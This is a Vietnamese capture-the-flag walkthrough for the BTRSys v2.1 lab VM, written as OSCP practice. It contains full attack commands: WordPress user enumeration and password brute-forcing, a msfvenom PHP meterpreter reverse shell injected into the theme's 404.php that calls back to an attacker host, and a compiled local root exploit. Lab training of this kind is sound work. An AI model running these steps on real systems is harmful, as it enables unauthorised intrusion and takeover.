[OSCP] Hack the BTRSys: v2.1 VM (Boot2Root Challenge)

Đây là bài CTF mà các bạn sẽ gặp trong kì thi OSCP Exam của mình, trong hầu hết những chương trình đào tạo về OSCP như INE đề có trình bày lab này, do đó cần thực hành cẩn thận. Tôi biên soạn tổng hợp từ nhiều nguôn, trong đó có lấy khung từ hackingarticles.

Độ khó : Intermediate

WalkThrough

Đầu tiên hãy tìm mục tiêu của bạn với netdiscover

# netdiscover

Trong bài học này mục tiêu có địa chỉ là 192.168.0.106 , hãy tiến hành scanning với NMAP qua lệnh sau : nmap -A 192.168.0.106

# nmap -A 192.168.0.106

hãy chú ý các port sau, và nhớ ghi vào sổ ghi chép để tạo thói quen pentest , nó sẽ giúp ích cho chúng ta khi thi thực tế port 21, 22 & 80 tương ứng các dịch vụ FTP, SSH, & HTTP . Với port 21 ta thử dò tìm các bug liên quan, ở đây không phải là vfstpf 234 nên khả năng dò ra lỗi không cao vì tác giả không chủ ý tạo ra lỗi này. Với cổng 80 thì bổn cũ soạn lại với DIRB & NIKTO. Các công cụ này có trình bày cặn kẽ trong kháo học OWASP Web Hacking, và là “vũ khí” không thể thiếu trong khó “đạn dược” của các bạn.

# dirb http://192.168.0.106

Kết quả trên cho ta thấy có thư mục upload, có thể sau này sẽ up shell lên và sẽ xuất hiện ở đây, thư mục wordpress cho ta ý nghĩ đến wpscan và enum tài khoản, rồi bẻ khóa nếu có thể …Hãy tiến hành lệnh sau trên Kali Linux 2019.1 cho nó mới mẽ ./wpscan.rb -u http://192.168.0.106/wordpress/ –enumerate at –enumerate ap –enumerate u

Ta thấy 2 tài khoản được liệt kê. Nhiều người hay hỏi Enumeration là gì, chương 4 của CEH v10 … Và hình sau sẽ minh họa cho thuật ngữ trên – btrisk & admin.

Thử bẻ khóa với wpscan luôn, dùng từ điển có sẳn trên Kali sẽ thấy admin có mật khẩu là admin. Bài bẻ khóa này các bạn sẽ minh họa trong bài học Hack Minotaur, quái vật đầu bò mà nhiều thành viên trong nhóm chúng ta đã chia sẽ trong các lớp học.

Hãy đăng nhập và tạo ngay con shell php với metasploit …: msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

Copy đoạn code trên từ đầu đến cuối và lưu thành tập tin shell.php hay txt rồi sau này đổi lại. Trong hướng khai thác này chúng ta sẽ tiếp cận theo cách khác, đ1o là chèn trực tiếp code shell vào tập tin 404.php như hình sau :

Và mở trình duyệt đến :

http://192.168.0.106/wordpress/wp-content/themes/twentyfourteen/404.php

Lúc này, các bạn phải lắng nghe trên Kali Linxu để hứng kết quả trả về qua port 4444:

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.107
set lport 4444
exploit

Nếu thành công ta sẽ thấy 1 session được tạo, hãy whoami, sysinfo … để xem thông tin

# sysinfo

Truy cập shell : shell

Ta thấy Ubuntu version là is 16.04.2 , thử tìm xem có thể leo thang hay có lỗi gì liên quan hay không ? Ta thấy exploit 41458 , hãy tải về và biên dịch .

Chạy lệnh sau : gcc 41458.c -o rootshell

# gcc 41458.c -o rootshell

Một khi biên dịch xong hãy up ngược lên mục tiêu trong thư mục tmp và chạy thử .

cd /tmp
upload /root/Desktop/rootshell .

Tiến hành gán quyền thực thi và run :

shell
cd /tmp
chmod 777 rootshell
./rootshell

Cuối cùng, gõ vào tên bộ phim yêu thích : whoami

ROOT ! Như vậy, các bạn có thể vượt qua bài tập kiểu này trong kì thi OSCP. Hãy cẩn thận thực hành lại 3 lần cho quen các thao tác.

Comments